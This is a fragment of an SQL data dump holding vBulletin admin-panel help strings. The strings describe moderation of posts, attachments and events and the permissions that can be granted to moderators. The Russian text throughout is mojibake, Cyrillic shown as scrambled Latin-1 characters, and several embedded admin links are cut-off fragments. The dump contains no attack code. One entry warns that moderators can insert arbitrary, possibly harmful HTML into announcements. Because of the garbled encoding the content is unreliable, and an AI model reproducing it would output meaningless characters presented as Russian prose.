(22664, -1, 'moderate_text', 'cphelptext', 'Ãðîâåðêà ñîäåðæèìîãî: \r\nÔîðóì ïîçâîëÿåò ïðîâåðÿòü ñîäåðæèìîå ðà çìåùà åìîé èÃôîðìà öèè äî å¸ ïóáëè÷Ãîãî îòîáðà æåÃèÿ. Ãòî ìîæåò áûòü ïîëåçÃî äëÿ ïðåäîòâðà ùåÃèÿ Ãåñîîòâåòñòâóþùèõ òåìà òèêå èëè ÃåïðèñòîéÃûõ òåì/ñîîáùåÃèé Ãà ôîðóìå. Âûáîð ýòîé îïöèè â ïà Ãåëè à äìèÃèñòðà òîðà ïîçâîëèò âà ì óïðà âëÿòü òåìà ìè, ñîîáùåÃèÿìè è âëîæåÃèÿìè, îæèäà þùèìè ïðîâåðêè. \r\nÃðîâåðêà òåì, ñîîáùåÃèé è âëîæåÃèé ìîæåò áûòü âêëþ÷åÃà Ãà óðîâÃÃ¥ ðà çäåëà (ñì. config[Misc][admincpdir]}/forum.php?do=modify\" target=\"_blank\">Óïðà âëåÃèå ðà çäåëà ìè ), Ãà óðîâÃÃ¥ ãðóïïû (ñì. config[Misc][admincpdir]}/usergroup.php?do=modify\" target=\"_blank\">Óïðà âëåÃèè ãðóïïà ìè ïîëüçîâà òåëåé ) è Ãà óðîâÃÃ¥ ïðà â ãðóïïû â îïðåäåëåÃÃîì ðà çäåëå (ñì. config[Misc][admincpdir]}/forumpermission.php?do=modify\" target=\"_blank\">Ãðà âà â ðà çäåëà õ ). ÀÃà ëîãè÷Ãî, ïðîâåðêà ñîáûòèé ìîæåò áûòü çà äåéñòâîâà Ãà Ãà óðîâÃÃ¥ ãðóïïû è Ãà óðîâÃÃ¥ êà ëåÃäà ðÿ (ñì. config[Misc][admincpdir]}/admincalendar.php?do=modify\" target=\"_blank\">Óïðà âëåÃèå êà ëåÃäà ðÿìè ).', 'vbulletin', '', 0, ''),
(22665, -1, 'moderate_title', 'cphelptext', 'Î ïðîâåðêå ñîäåðæèìîãî', 'vbulletin', '', 0, ''),
(22666, -1, 'moderate_attachments_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò óïðà âëÿòü âëîæåÃèÿìè, îæèäà þùèìè ïðîâåðêè. Ãèæå îòîáðà æåà ñïèñîê âëîæåÃèé, îæèäà þùèõ ïðîâåðêè (åñëè åñòü). Âûáåðèòå äåéñòâèå äëÿ êà æäîãî âëîæåÃèÿ (ïîäòâåðäèòü, óäà ëèòü èëè èãÃîðèðîâà òü) è Ãà æìèòå êÃîïêó \"Ñîõðà Ãèòü\" äëÿ ïðîäîëæåÃèÿ. \r\nÃîäòâåðæäåÃèå âëîæåÃèÿ ñäåëà åò åãî âèäèìûì äëÿ ïîëüçîâà òåëåé è óáåðåò åãî èç ýòîãî ñïèñêà . Óäà ëåÃèå âëîæåÃèÿ ïîëÃîñòüþ óäà ëèò åãî. ÈãÃîðèðîâà Ãèå âëîæåÃèÿ îòëîæèò ïðîâåðêó äëÿ äðóãîãî ìîäåðà òîðà , ëèáî âû ñà ìîñòîÿòåëüÃî ñìîæåòå ïðèÃÿòü ðåøåÃèå ïîçæå. \r\nÅñëè òðåáóåòñÿ ïîäòâåðäèòü, óäà ëèòü èëè èãÃîðèðîâà òü âñå âëîæåÃèÿ, îæèäà þùèå ïðîâåðêè, Ãà æìèòå ñîîòâåòñòâóþùóþ êÃîïêó ââåðõó ñòðà Ãèöû, ýòî ïðèâåäåò ê âûïîëÃÃ¥Ãèþ óêà çà ÃÃîãî äåéñòâèÿ êî âñåì âëîæåÃèÿì, îæèäà þùèì ïðîâåðêè.', 'vbulletin', '', 0, ''),
(22667, -1, 'moderate_attachments_title', 'cphelptext', 'Ãðîâåðêà âëîæåÃèé', 'vbulletin', '', 0, ''),
(22668, -1, 'moderate_attachments_attachaction_text', 'cphelptext', 'Óêà æèòå, ÷òî òðåáóåòñÿ ñäåëà òü ñ ýòèì âëîæåÃèåì. ÃîäòâåðæäåÃèå âëîæåÃèÿ ñäåëà åò åãî âèäèìûì äëÿ ïîëüçîâà òåëåé è óáåðåò åãî èç ýòîãî ñïèñêà . Óäà ëåÃèå âëîæåÃèÿ ïîëÃîñòüþ óäà ëèò åãî. ÈãÃîðèðîâà Ãèå âëîæåÃèÿ îòëîæèò ïðîâåðêó äëÿ äðóãîãî ìîäåðà òîðà , ëèáî âû ñà ìîñòîÿòåëüÃî ñìîæåòå ïðèÃÿòü ðåøåÃèå ïîçæå.', 'vbulletin', '', 0, ''),
(22669, -1, 'moderate_attachments_attachaction_title', 'cphelptext', 'Äåéñòâèå', 'vbulletin', '', 0, ''),
(22670, -1, 'moderate_events_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò óïðà âëÿòü ñîáûòèÿìè, îæèäà þùèìè ïðîâåðêè. Ãèæå îòîáðà æåà ñïèñîê ñîáûòèé, îæèäà þùèõ ïðîâåðêè (åñëè åñòü). Âûáåðèòå äåéñòâèå äëÿ êà æäîãî ñîáûòèÿ (ïîäòâåðäèòü, óäà ëèòü èëè èãÃîðèðîâà òü) è Ãà æìèòå êÃîïêó \"Ñîõðà Ãèòü\" äëÿ ïðîäîëæåÃèÿ. \r\nÃîäòâåðæäåÃèå ñîáûòèÿ ñäåëà åò åãî âèäèìûì äëÿ ïîëüçîâà òåëåé è óáåðåò åãî èç ýòîãî ñïèñêà . Óäà ëåÃèå ñîáûòèÿ ïîëÃîñòüþ óäà ëèò åãî. ÈãÃîðèðîâà Ãèå ñîáûòèÿ îòëîæèò ïðîâåðêó äëÿ äðóãîãî ìîäåðà òîðà , ëèáî âû ñà ìîñòîÿòåëüÃî ñìîæåòå ïðèÃÿòü ðåøåÃèå ïîçæå. \r\nÅñëè òðåáóåòñÿ ïîäòâåðäèòü, óäà ëèòü èëè èãÃîðèðîâà òü âñå ñîáûòèÿ, îæèäà þùèå ïðîâåðêè, Ãà æìèòå ñîîòâåòñòâóþùóþ êÃîïêó ââåðõó ñòðà Ãèöû, ýòî ïðèâåäåò ê âûïîëÃÃ¥Ãèþ óêà çà ÃÃîãî äåéñòâèÿ êî âñåì ñîáûòèÿì, îæèäà þùèì ïðîâåðêè. \r\nÂû ìîæåòå ðåäà êòèðîâà òü òåêñò ñîáûòèé, ïîêà ïðîâåðÿåòå èõ. Ãà ïðèìåð, åñòü ñîáûòèå, ó êîòîðîãî çà ãîëîâîê ÃÃ¥ îòðà æà åò ñóòü. ×òîáû èñïðà âèòü ýòî, ïðîñòî èñïðà âüòå çà ãîëîâîê ñîáûòèÿ è ïîäòâåðäèòå åãî.', 'vbulletin', '', 0, ''),
(22671, -1, 'moderate_events_title', 'cphelptext', 'Ãðîâåðêà ñîáûòèé', 'vbulletin', '', 0, ''),
(22672, -1, 'moderate_events_eventsubject_text', 'cphelptext', 'Ãòî çà ãîëîâîê ñîáûòèÿ. Åñëè çà ãîëîâîê ÃÃ¥ ñîîòâåòñòâóåò ñîáûòèþ èëè âû ïðîñòî æåëà åòå èçìåÃèòü åãî, ïðîñòî èçìåÃèòå òåêñò çäåñü, ïðåæäå ÷åì ïîäòâåðäèòü ñîáûòèå.', 'vbulletin', '', 0, ''),
(22673, -1, 'moderate_events_eventsubject_title', 'cphelptext', 'Òåìà ', 'vbulletin', '', 0, ''),
(22674, -1, 'moderate_events_eventtext_text', 'cphelptext', 'Ãòî îïèñà Ãèå ñîáûòèÿ. Åñëè âû æåëà åòå èçìåÃèòü ýòîò òåêñò, ïðîñòî îòðåäà êòèðóéòå åãî äî ïîäòâåðæäåÃèÿ ñîáûòèÿ.', 'vbulletin', '', 0, ''),
(22675, -1, 'moderate_events_eventtext_title', 'cphelptext', 'Ñîáûòèå', 'vbulletin', '', 0, ''),
(22676, -1, 'moderate_events_eventaction_text', 'cphelptext', 'Óêà æèòå, ÷òî òðåáóåòñÿ ñäåëà òü ñ ýòèì ñîáûòèåì. ÃîäòâåðæäåÃèå ñîáûòèÿ åãî èç ýòîãî ñïèñêà . Óäà ëåÃèå ñîáûòèÿ ïîëÃîñòüþ óäà ëèò åãî. ÈãÃîðèðîâà Ãèå ñîáûòèÿ îòëîæèò ïðîâåðêó äëÿ äðóãîãî ìîäåðà òîðà , ëèáî âû ñà ìîñòîÿòåëüÃî ñìîæåòå ïðèÃÿòü ðåøåÃèå ïîçæå.', 'vbulletin', '', 0, ''),
(22677, -1, 'moderate_events_eventaction_title', 'cphelptext', 'Äåéñòâèå', 'vbulletin', '', 0, ''),
(22678, -1, 'moderate_posts_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò óïðà âëÿòü ñîîáùåÃèÿìè, îæèäà þùèìè ïðîâåðêè. Ãèæå îòîáðà æåà ñïèñîê ñîîáùåÃèé, îæèäà þùèõ ïðîâåðêè (åñëè åñòü). Âûáåðèòå äåéñòâèå äëÿ êà æäîãî ñîîáùåÃèÿ (ïîäòâåðäèòü, óäà ëèòü èëè èãÃîðèðîâà òü) è Ãà æìèòå êÃîïêó \"Ñîõðà Ãèòü\" äëÿ ïðîäîëæåÃèÿ. \r\nÃîäòâåðæäåÃèå ñîîáùåÃèÿ ñäåëà åò åãî âèäèìûì äëÿ ïîëüçîâà òåëåé è óáåðåò åãî èç ýòîãî ñïèñêà . Óäà ëåÃèå ñîîáùåÃèÿ ïîëÃîñòüþ óäà ëèò åãî. ÈãÃîðèðîâà Ãèå ñîîáùåÃèÿ îòëîæèò ïðîâåðêó äëÿ äðóãîãî ìîäåðà òîðà , ëèáî âû ñà ìîñòîÿòåëüÃî ñìîæåòå ïðèÃÿòü ðåøåÃèå ïîçæå. \r\nÅñëè òðåáóåòñÿ ïîäòâåðäèòü, óäà ëèòü èëè èãÃîðèðîâà òü âñå ñîîáùåÃèÿ, îæèäà þùèå ïðîâåðêè, Ãà æìèòå ñîîòâåòñòâóþùóþ êÃîïêó ââåðõó ñòðà Ãèöû, ýòî ïðèâåäåò ê âûïîëÃÃ¥Ãèþ óêà çà ÃÃîãî äåéñòâèÿ êî âñåì ñîáûòèÿì, îæèäà þùèì ïðîâåðêè. \r\nÂû ìîæåòå ðåäà êòèðîâà òü òåêñò òåì è ñîîáùåÃèé, ïîêà ïðîâåðÿåòå èõ. Ãà ïðèìåð, åñòü òåìà ñîîáùåÃèÿ, ÃÃ¥ îòâå÷à þùà ÿ ñîäåðæèìîìó ñà ìîãî ñîîáùåÃèÿ. ×òîáû èñïðà âèòü òåìó ïðîñòî îòðåäà êòèðóéòå òåêñò â Ãà çâà Ãèå òåìû è ïîäòâåðäèòå ñîîáùåÃèå.', 'vbulletin', '', 0, ''),
(22679, -1, 'moderate_posts_title', 'cphelptext', 'Ãðîâåðêà òåì/ñîîáùåÃèé', 'vbulletin', '', 0, ''),
(22680, -1, 'moderate_posts_threadtitle_text', 'cphelptext', 'Ãòî Ãà çâà Ãèå òåìû. Åñëè Ãà çâà Ãèå ÃÃ¥ ñîîòâåòñòâóåò òåìå èëè ïðîñòî Ãåîáõîäèìî åãî èçìåÃèòü, èçìåÃèòå Ãà çâà Ãèå çäåñü, ïðåæäå ÷åì ïîäòâåðäèòü òåìó.', 'vbulletin', '', 0, ''),
(22681, -1, 'moderate_posts_threadtitle_title', 'cphelptext', 'Çà ãîëîâîê', 'vbulletin', '', 0, ''),
(22682, -1, 'moderate_posts_threadpagetext_text', 'cphelptext', 'Ãòî ïåðâîå ñîîáùåÃèå äà ÃÃîé òåìû. Åñëè âû æåëà åòå ðåäà êòèðîâà òü åãî, òî ïðîñòî èçìåÃèòå ñîîáùåÃèå äî ïîäòâåðæäåÃèÿ òåìû.', 'vbulletin', '', 0, ''),
(22683, -1, 'moderate_posts_threadpagetext_title', 'cphelptext', 'ÑîîáùåÃèå', 'vbulletin', '', 0, ''),
(22684, -1, 'moderate_posts_threadnotes_text', 'cphelptext', ' ïðèìå÷à Ãèÿõ çà ïèñà Ãû ëþáûå äåéñòâèÿ ïî ïðîâåðêå ýòîé òåìû.  ïðèìå÷à Ãèè âû ìîæåòå îñòà âèòü êîììåÃòà ðèé ê ýòîé òåìå.', 'vbulletin', '', 0, ''),
(22685, -1, 'moderate_posts_threadnotes_title', 'cphelptext', 'Çà ìå÷à Ãèÿ', 'vbulletin', '', 0, ''),
(22686, -1, 'moderate_posts_threadaction_text', 'cphelptext', 'Óêà æèòå, ÷òî òðåáóåòñÿ ñäåëà òü ñ ýòîé òåìîé. ÃîäòâåðæäåÃèå òåìû ñäåëà åò åå âèäèìîé äëÿ ïîëüçîâà òåëåé è óáåðåò èç ýòîãî ñïèñêà . Óäà ëåÃèå òåìû ïîëÃîñòüþ óäà ëèò åå. ÈãÃîðèðîâà Ãèå òåìû îòëîæèò ïðîâåðêó äëÿ äðóãîãî ìîäåðà òîðà , ëèáî âû ñà ìîñòîÿòåëüÃî ñìîæåòå ïðèÃÿòü ðåøåÃèå ïîçæå.', 'vbulletin', '', 0, ''),
(22687, -1, 'moderate_posts_threadaction_title', 'cphelptext', 'Äåéñòâèå', 'vbulletin', '', 0, ''),
(22688, -1, 'moderate_posts_posttitle_text', 'cphelptext', 'Ãòî òåìà ñîîáùåÃèÿ. Åñëè òåìà ÃÃ¥ ñîîòâåòñòâóåò ñîîáùåÃèþ èëè ïðîñòî òðåáóåòñÿ èçìåÃèòü åå, òî îòðåäà êòèðóéòå Ãà çâà Ãèå çäåñü, ïðåæäå ÷åì ïîäòâåðäèòü ñîîáùåÃèå.', 'vbulletin', '', 0, ''),
(22689, -1, 'moderate_posts_posttitle_title', 'cphelptext', 'Çà ãîëîâîê', 'vbulletin', '', 0, ''),
(22690, -1, 'moderate_posts_postpagetext_text', 'cphelptext', 'Ãòî òåêñò ñîîáùåÃèÿ. Åñëè âû æåëà åòå èçìåÃèòü ýòîò òåêñò, ïðîñòî îòðåäà êòèðóéòå ñîîáùåÃèå äî åãî ïîäòâåðæäåÃèÿ.', 'vbulletin', '', 0, ''),
(22691, -1, 'moderate_posts_postpagetext_title', 'cphelptext', 'ÑîîáùåÃèå', 'vbulletin', '', 0, ''),
(22692, -1, 'moderate_posts_postaction_text', 'cphelptext', 'Óêà æèòå, ÷òî òðåáóåòñÿ ñäåëà òü ñ ýòèì ñîîáùåÃèåì. ÃîäòâåðæäåÃèå ñîîáùåÃèÿ ñäåëà åò åãî âèäèìûì äëÿ ïîëüçîâà òåëåé è óáåðåò èç ýòîãî ñïèñêà . Óäà ëåÃèå ñîîáùåÃèÿ ïîëÃîñòüþ óäà ëèò åãî. ÈãÃîðèðîâà Ãèå ñîîáùåÃèÿ îòëîæèò ïðîâåðêó äëÿ äðóãîãî ìîäåðà òîðà , ëèáî âû ñà ìîñòîÿòåëüÃî ñìîæåòå ïðèÃÿòü ðåøåÃèå ïîçæå.', 'vbulletin', '', 0, ''),
(22693, -1, 'moderate_posts_postaction_title', 'cphelptext', 'Äåéñòâèå', 'vbulletin', '', 0, ''),
(22694, -1, 'moderator_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÃà çäåëû \r\nÃðà âà â ðà çäåëå \r\nÌîäåðà òîðû \r\nÃðîñìîòð ïðà â \r\nÌîäåðà òîðû: \r\nÌîäåðà òîðîâ ìîæÃî äîáà âëÿòü â ðà çäåëû, ÷òîáû îÃè ïîìîãà ëè âà ì óïðà âëÿòü ñîäåðæèìûì ôîðóìà . Ãðèâèëåãèè ìîäåðà òîðà ñëåäóåò äà âà òü òîëüêî äîâåðåÃÃûì ëèöà ì. \r\nÌîäåðà òîðû ìîãóò ïðîèçâîäèòü ðà çëè÷Ãûå äåéñòâèÿ Ãà ä òåìà ìè, âêëþ÷à ÿ çà êðûòèå òåì (â òåìó áîëüøå Ãåëüçÿ îòâå÷à òü), ïåðåìåùåÃèå/êîïèðîâà Ãèå òåì â äðóãèå ðà çäåëû, óñòà Ãîâêó/ñÃÿòèå äëÿ òåìû ñòà òóñà \"Âà æÃà ÿ\" (òåìû îñòà þòñÿ Ãà âåðõó ñïèñêà òåì), ðåäà êòèðîâà Ãèå è óäà ëåÃèå òåì, îáúåäèÃÃ¥Ãèå òåì (äâå òåìû ñòà Ãîâÿòñÿ îäÃîé), ðà çäåëåÃèå òåì (îäÃà òåìà ðà çáèâà åòñÿ Ãà äâå).', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(22695, -1, 'moderator_title', 'cphelptext', 'Î ìîäåðà òîðà õ', 'vbulletin', '', 0, ''),
(22696, -1, 'moderator_add_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå äîáà âèòü Ãîâîãî ìîäåðà òîðà ðà çäåëà . Ãèæå - ñïèñîê ïðà â è îïöèé, êîòîðûå âû ìîæåòå óñòà Ãîâèòü äëÿ Ãåãî.', 'vbulletin', '', 0, ''),
(22697, -1, 'moderator_add_title', 'cphelptext', 'Äîáà âëåÃèå Ãîâîãî ìîäåðà òîðà ', 'vbulletin', '', 0, ''),
(22698, -1, 'moderator_add_usergroupid_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëèò èçìåÃèòü îñÃîâÃóþ ãðóïïó ïîëüçîâà òåëÿ, êîãäà îà ñòà Ãåò ìîäåðà òîðîì. ÄîâîëüÃî ÷à ñòî, äëÿ óäîáñòâà , ñîçäà þòñÿ îïðåäåëåÃÃûå ãðóïïû ïîëüçîâà òåëåé-ìîäåðà òîðîâ, êîòîðûå èìåþò îïðåäåëåÃÃûå äîïîëÃèòåëüÃûå ïðà âà . Ãòîé îïöèåé âû ìîæåòå èçìåÃèòü îñÃîâÃóþ ãðóïïó äà ÃÃîãî ïîëüçîâà òåëÿ Ãà îäÃó èç òà êèõ ãðóïï.', 'vbulletin', '', 0, ''),
(22699, -1, 'moderator_add_usergroupid_title', 'cphelptext', 'ÈçìåÃèòü îñÃîâÃóþ ãðóïïó ìîäåðà òîðà ', 'vbulletin', '', 0, ''),
(22700, -1, 'moderator_add_membergroupids_text', 'cphelptext', 'Ãòà îïöèÿ ïîçâîëèò äîáà âèòü ïîëüçîâà òåëÿ â îäÃó èç óêà çà ÃÃûõ ãðóïï ïîñëå òîãî, êà ê îà ñòà Ãåò ìîäåðà òîðîì.', 'vbulletin', '', 0, ''),
(22701, -1, 'moderator_add_membergroupids_title', 'cphelptext', 'Äîáà âèòü â ãðóïïó', 'vbulletin', '', 0, ''),
(22702, -1, 'moderator_add_edit_forumid_text', 'cphelptext', 'Óêà æèòå ðà çäåë, çà ïîðÿäêîì â êîòîðîì äîëæåà áóäåò ñëåäèòü äà ÃÃûé ïîëüçîâà òåëü. Ãðè äîáà âëåÃèè ìîäåðà òîðà â ðà çäåë îà à âòîìà òè÷åñêè ñòà Ãîâèòñÿ ìîäåðà òîðîì âñåõ åãî ïîäðà çäåëîâ.', 'vbulletin', '', 0, ''),
(22703, -1, 'moderator_add_edit_forumid_title', 'cphelptext', 'Ãà çäåë', 'vbulletin', '', 0, ''),
(22704, -1, 'moderator_add_edit_modusername_text', 'cphelptext', 'Ââåäèòå èìÿ/èìåÃà òîãî/òåõ, êòî õî÷åò ñòà òü ìîäåðà òîðîì(à ìè). Ãà çäåëÿéòå èìåÃà ïîëüçîâà òåëåé òî÷êîé ñ çà ïÿòîé (;). \r\n \r\nÅñëè âû óêà æèòå ÃåâåðÃîå èìÿ ïîëüçîâà òåëÿ, òî Ãè îäèà èç ìîäåðà òîðîâ ÃÃ¥ áóäåò äîáà âëåÃ.', 'vbulletin', 'zCarot', 1191255773, '3.7.0 Beta 1'),
(22705, -1, 'moderator_add_edit_modusername_title', 'cphelptext', 'ÈìåÃà ìîäåðà òîðîâ', 'vbulletin', 'zCarot', 1191255773, '3.7.0 Beta 1'),
(22706, -1, 'moderator_add_edit_editglobal_candeletealbumpicture_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó óäà ëÿòü ëþáîé \"à ëüáîì\" èëè \"èçîáðà æåÃèå\" Ãà ôîðóìå.', 'vbulletin', 'zCarot', 1195745106, '3.7.0 Beta 1'),
(22707, -1, 'moderator_add_edit_editglobal_candeletealbumpicture_title', 'cphelptext', 'Ìîæåò óäà ëÿòü à ëüáîìû / èçîáðà æåÃèÿ', 'vbulletin', 'zCarot', 1195745106, '3.7.0 Beta 1'),
(22708, -1, 'moderator_add_edit_editglobal_candeletepicturecomments_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó ìÿãêî óäà ëÿòü êîììåÃòà ðèè ê èçîáðà æåÃèÿì.', 'vbulletin', 'zCarot', 1208274149, '3.7.0 Release Candidate 4'),
(22709, -1, 'moderator_add_edit_editglobal_candeletepicturecomments_title', 'cphelptext', 'Ìîæåò óäà ëÿòü êîììåÃòà ðèè ê èçîáðà æåÃèÿì', 'vbulletin', 'zCarot', 1208274149, '3.7.0 Release Candidate 4'),
(22710, -1, 'moderator_add_edit_editglobal_caneditpicturecomments_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó ðåäà êòèðîâà òü êîììåÃòà ðèè ê èçîáðà æåÃèÿì.', 'vbulletin', 'zCarot', 1208274076, '3.7.0 Release Candidate 4'),
(22711, -1, 'moderator_add_edit_editglobal_caneditpicturecomments_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü êîììåÃòà ðèè ê èçîáðà æåÃèÿì', 'vbulletin', 'zCarot', 1208274076, '3.7.0 Release Candidate 4'),
(22712, -1, 'moderator_add_edit_editglobal_canmoderatepicturecomments_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó ïðîâåðÿòü êîììåÃòà ðèè ê èçîáðà æåÃèÿì.', 'vbulletin', 'zCarot', 1208274242, '3.7.0 Release Candidate 4'),
(22713, -1, 'moderator_add_edit_editglobal_canmoderatepicturecomments_title', 'cphelptext', 'Ìîæåò ïðîâåðÿòü êîììåÃòà ðèè ê èçîáðà æåÃèÿì', 'vbulletin', 'zCarot', 1208274242, '3.7.0 Release Candidate 4'),
(22714, -1, 'moderator_add_edit_editglobal_canmoderatepictures_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó ïðîâåðÿòü Ãîâûå èçîáðà æåÃèÿ.', 'vbulletin', 'zCarot', 1208274048, '3.7.0 Release Candidate 4'),
(22715, -1, 'moderator_add_edit_editglobal_canmoderatepictures_title', 'cphelptext', 'Ìîæåò ïðîâåðÿòü èçîáðà æåÃèÿ', 'vbulletin', 'zCarot', 1208274048, '3.7.0 Release Candidate 4'),
(22716, -1, 'moderator_add_edit_editglobal_canremovepicturecomments_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó ôèçè÷åñêè óäà ëÿòü êîììåÃòà ðèè ê èçîáðà æåÃèÿì èç áà çû äà ÃÃûõ.', 'vbulletin', 'zCarot', 1208274207, '3.7.0 Release Candidate 4'),
(22717, -1, 'moderator_add_edit_editglobal_canremovepicturecomments_title', 'cphelptext', 'Ìîæåò ôèçè÷åñêè óäà ëÿòü êîììåÃòà ðèè ê èçîáðà æåÃèÿì', 'vbulletin', 'zCarot', 1208274207, '3.7.0 Release Candidate 4'),
(22718, -1, 'moderator_add_edit_editglobal_caneditposts_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó ðåäà êòèðîâà òü ñîîáùåÃèÿ ïîëüçîâà òåëåé â ñâîåì ðà çäåëå. Ñâîè ñîîáùåÃèÿ îà ìîæåò ðåäà êòèðîâà òü Ãåçà âèñèìî îò ýòîé îïöèè (ýòî ìîæÃî èçìåÃèòü â ïðà âà õ ãðóïïû ïîëüçîâà òåëåé).', 'vbulletin', '', 0, ''),
(22719, -1, 'moderator_add_edit_editglobal_caneditposts_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü ñîîáùåÃèÿ', 'vbulletin', '', 0, ''),
(22720, -1, 'moderator_add_edit_editglobal_candeleteposts_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó óäà ëÿòü è âîññòà Ãà âëèâà òü ñîîáùåÃèÿ ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(22721, -1, 'moderator_add_edit_editglobal_candeleteposts_title', 'cphelptext', 'Ìîæåò óäà ëÿòü ñîîáùåÃèÿ', 'vbulletin', '', 0, ''),
(22722, -1, 'moderator_add_edit_editglobal_canremoveposts_text', 'cphelptext', 'Ôîðóì ïîääåðæèâà åò 2 óðîâÃÿ óäà ëåÃèÿ: óäà ëåÃèå ñ âîçìîæÃîñòüþ âîññòà ÃîâëåÃèÿ è ïîëÃîå ôèçè÷åñêîå óäà ëåÃèå áåç âîçìîæÃîñòè âîññòà ÃîâëåÃèÿ. Ãòà îïöèÿ ïîçâîëÿåò ìîäåðà òîðó îñóùåñòâëÿòü âòîðîé âà ðèà Ãò.', 'vbulletin', '', 0, ''),
(22723, -1, 'moderator_add_edit_editglobal_canremoveposts_title', 'cphelptext', 'Ìîæåò ôèçè÷åñêè óäà ëÿòü ñîîáùåÃèÿ', 'vbulletin', '', 0, ''),
(22724, -1, 'moderator_add_edit_editglobal_canopenclose_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó îòêðûâà òü è çà êðûâà òü òåìû. Çà êðûòûå òåìû îòîáðà æà þòñÿ ñî çÃà ÷êîì çà ìêà è Ãèêòî, êðîìå ìîäåðà òîðîâ è à äìèÃèñòðà òîðîâ ÃÃ¥ ñìîæåò îñòà âëÿòü ñîîáùåÃèÿ â Ãèõ.', 'vbulletin', '', 0, ''),
(22725, -1, 'moderator_add_edit_editglobal_canopenclose_title', 'cphelptext', 'Ìîæåò îòêðûâà òü/çà êðûâà òü òåìû', 'vbulletin', '', 0, ''),
(22726, -1, 'moderator_add_edit_editglobal_caneditthreads_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó ðåäà êòèðîâà òü Ãà çâà Ãèå òåìû è åå èêîÃêó.', 'vbulletin', '', 0, ''),
(22727, -1, 'moderator_add_edit_editglobal_caneditthreads_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü òåìû', 'vbulletin', '', 0, ''),
(22728, -1, 'moderator_add_edit_editglobal_canmanagethreads_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó óïðà âëÿòü äðóãèìè îïöèÿìè òåìû (óñòà Ãîâêà /ñÃÿòèå ñòà òóñà \"Âà æÃà ÿ\", îáúåäèÃÃ¥Ãèå, ðà çäåëåÃèå è ò.ä.). \r\nÃðè ïðèñâîåÃèè ñòà òóñà \"Âà æÃà ÿ\", òåìà âñåãäà îòîáðà æà åòñÿ ââåðõó ñïèñêà òåì. ÎáúåäèÃÃ¥Ãèå ïîçâîëÿåò ìîäåðà òîðó îáúåäèÃèòü ñîîáùåÃèÿ èç äâóõ òåì â îäÃó. Ãà çäåëåÃèå ïîçâîëÿåò ìîäåðà òîðó ðà çáèòü ñîîáùåÃèÿ èç îäÃîé Ãà äâå ðà çëè÷Ãûå òåìû.', 'vbulletin', '', 0, ''),
(22729, -1, 'moderator_add_edit_editglobal_canmanagethreads_title', 'cphelptext', 'Ìîæåò óïðà âëÿòü òåìà ìè', 'vbulletin', '', 0, ''),
(22730, -1, 'moderator_add_edit_editglobal_caneditpoll_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó ðåäà êòèðîâà òü îïöèè è ðåçóëüòà òû îïðîñîâ â ñâîåì ðà çäåëå.', 'vbulletin', '', 0, ''),
(22731, -1, 'moderator_add_edit_editglobal_caneditpoll_title', 'cphelptext', 'Ìîæåò ðåäà êòèðîâà òü îïðîñû', 'vbulletin', '', 0, ''),
(22732, -1, 'moderator_add_edit_editglobal_canannounce_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó ðà çìåùà òü îáúÿâëåÃèÿ â ñâîåì ðà çäåëå. \r\n \r\nÓ÷òèòå, ÷òî ìîäåðà òîð ñìîæåò âêëþ÷à òü ëþáîé HTML êîä â îáúÿâëåÃèå (âêëþ÷à ÿ âðåäîÃîñÃûé). Ñëåäóåò ìà êñèìà ëüÃî îãðà Ãè÷èòü äîñòóï ê ýòîé ôóÃêöèè, îñîáåÃÃî äëÿ òåõ, êîìó âû ÃÃ¥ äîâåðÿåòå.', 'vbulletin', 'zCarot', 1219837452, '3.8.0 Alpha 1'),
(22733, -1, 'moderator_add_edit_editglobal_canannounce_title', 'cphelptext', 'Ìîæåò ðà çìåùà òü îáúÿâëåÃèÿ', 'vbulletin', '', 0, ''),
(22734, -1, 'moderator_add_edit_editglobal_canmoderateposts_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó ïîäòâåðæäà òü ñîîáùåÃèÿ (îïöèÿ ðà áîòà åò, åñëè â ýòîì ðà çäåëå âêëþ÷åÃà ïðîâåðêà ñîîáùåÃèé). Ãòà îïöèÿ ïðåäïîëà ãà åò, ÷òî ó ìîäåðà òîðà áóäåò âîçìîæÃîñòü îòïðà âëÿòü ñîîáùåÃèÿ Ãà ïåðåïðîâåðêó.', 'vbulletin', '', 0, ''),
(22735, -1, 'moderator_add_edit_editglobal_canmoderateposts_title', 'cphelptext', 'Ìîæåò ïðîâåðÿòü ñîîáùåÃèÿ', 'vbulletin', '', 0, ''),
(22736, -1, 'moderator_add_edit_editglobal_canmoderateattachments_text', 'cphelptext', 'Ãîçâîëÿåò ìîäåðà òîðó ïîäòâåðæäà òü âëîæåÃèÿ (îïöèÿ ðà áîòà åò, åñëè â ýòîì ðà çäåëå âêëþ÷åÃà ïðîâåðêà âëîæåÃèé).', 'vbulletin', '', 0, ''),
(22737, -1, 'moderator_add_edit_editglobal_canmoderateattachments_title', 'cphelptext', 'Ìîæåò ïðîâåðÿòü âëîæåÃèÿ', 'vbulletin', '', 0, ''),
